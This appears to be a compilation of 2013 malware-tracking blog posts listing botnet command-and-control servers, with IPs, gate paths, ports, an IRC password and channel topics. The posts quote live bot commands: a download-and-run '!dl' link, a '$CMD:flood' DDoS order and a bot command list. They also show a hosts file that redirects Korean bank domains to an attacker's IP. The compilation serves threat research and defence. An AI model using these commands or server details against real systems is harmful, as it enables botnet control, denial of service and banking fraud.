Resolved notify.mpa-a.com to 95.163.76.59 Server: notify.mpa-a.com Config file: notify.mpa-a.com/msupd6.bin Gate file: notify.mpa-a.com/index.php Hosting infos: http://whois.domaintools.com/95.163.76.59
xixbh.net (ngrbot irc botnet hosted by oneandone.net)
Resolved xixbh.net to 212.227.83.111, 213.165.68.138, 85.25.86.198 Server: xixbh.net (alternate domains: xixbh.com gigasbh.org) Port: 1863 Server password: jobs Channel: #jobs Topic for #jobs is: !dl hxxp://hotfile.com/dl/200451226/2ff4c3f/orf4Duu.html Topic for #jobs set by x at Fri Mar 29 13:40:52 2013 SSL is required to connect to this server This is the same guy as these previous posts.
dictionarysrnifty.no-ip.org (Athena irc botnet hosted by infiumhost.com)
Resolved dictionarysrnifty.no-ip.org to 188.190.99.19 Server: dictionarysrnifty.no-ip.org Port: 9001 * I have 83 clients and 0 servers * 83 451 :Current local users 83, max 451 Channel: #alpha Topic for #alpha is: !botkill.start Topic for #alpha set by LK at Fri Mar 29 10:30:08 2013 All users are also joined to the channel #lobby on connection.Read more...
axhost.info (Pandora http botnet hosted by dataclub.biz)
Resolved axhost.info to 46.183.217.148 Server: axhost.info Gate file: /m/admin.php?1=HAX&v=0&q=0&b= Config file: /m/config.php Hosting infos: http://whois.domaintools.com/46.183.217.148
truboot.org (Athena http botnet hosted by edenhost.com)
Resolved truboot.org to 94.242.205.226 Server: truboot.org Gate file: /at/gate.php This is the http version of the athena irc bot, which has graced this blog many times. Login page located at truboot.org/at/login/index.php Hosting infos: http://whois.domaintools.com/94.242.205.226
192.211.54.156 (Page view botnet hosted by incero.com)
Server: 192.211.54.156 Url locations: /Programs/links/Maki/, /Programs/links/Angelo/ The malware opens all the pages in each folder, and visits any urls that are contained in them. Current urls: <meta HTTP-EQUIV="REFRESH" content="0; url=http://minecraftadminhack.blogspot.com/"> <meta HTTP-EQUIV="REFRESH" content="0; url=http://tf2itemsgenerator.blogspot.com/"> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.youtube.com/watch?v=UUTZW2AjhFI"> <meta HTTP-EQUIV="REFRESH" content="0; url=http://minecraftadminhack.blogspot.com"> <meta HTTP-EQUIV="REFRESH" content="0; url=http://youtu.be/AhPTX1n_8p8"> <meta HTTP-EQUIV="REFRESH" content="0; url=http://f65a1cad.yyv.co"> <meta HTTP-EQUIV="REFRESH" content="0; url=http://14b3e31e.linkbucks.com"> <METARead more...
irc.benjol.tk(Linux bots hosted in France Roubaix Ovh Systems)
Resolved : [irc.benjol.tk] To [37.59.42.103]Resolved : [irc.benjol.tk] To [46.45.183.189] GIF89a ? ????ÿÿÿ!ù ????,???? ? ?? D ?;?<? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to>Read more...
img14.poco.cn(HTTP Banking trojan hosted in China Shanghai Chinanet Shanghai Province Network)
Resolved : [img14.poco.cn] To [101.226.200.132] Resolved : [img14.poco.cn] To [101.226.200.130] Resolved : [img14.poco.cn] To [61.183.42.151] Resolved : [img14.poco.cn] To [101.226.200.134] Resolved : [img14.poco.cn] To [101.226.200.152] Resolved : [img14.poco.cn] To [61.183.42.150] Samples: hxxp://www.ccfyi.com/notepad.exe hxxp://www.ccfyi.com/mstsc.exe hxxp://www.ccfyi.com/cc.tx timg14.poco.cn GET /mypoco/myphoto/20130323/19/874940020130323195257040.jpg hxxp://174.139.56.114:54321/1.txt 1.txt: 67.198.167.37 keb.co.kr 67.198.167.37 keb.co.kr 67.198.167.37 www.keb.co.kr 67.198.167.37 www.keb.co.kr 67.198.167.37 citibank.co.kr 67.198.167.37 citibank.co.kr 67.198.167.37 www.citibank.co.kr 67.198.167.37 www.citibank.co.krRead more...
SKPHTTPBOT(http bot hosted in Croatia Zagreb Voljatel Telekomunikacije D.o.o.)
Credits to anonymous guy from here for the sample this is another hf http bot Login:176.62.0.9 He’s ddosing someone allready look here:176.62.0.9/cmds.php $CMD:flood 91.207.5.190 3389 120 15 hosting infos: http://whois.domaintools.com/176.62.0.9
turnaroundhot.info (Betabot http botnet hosted by dataclub.biz)
Resolved turnaroundhot.info to 46.183.217.111 Server: turnaroundhot.info Gate file: /hot/order.php Alternate domains: fivestarintack.ws/live/order.php, tstartedtoearly.info/hot/order.php The owner seems to be using it to direct views towards www.twitch.tv/bowserdubs, where an Estonian-American is currently streaming Runescape. Hosting infos: http://whois.domaintools.com/46.183.217.111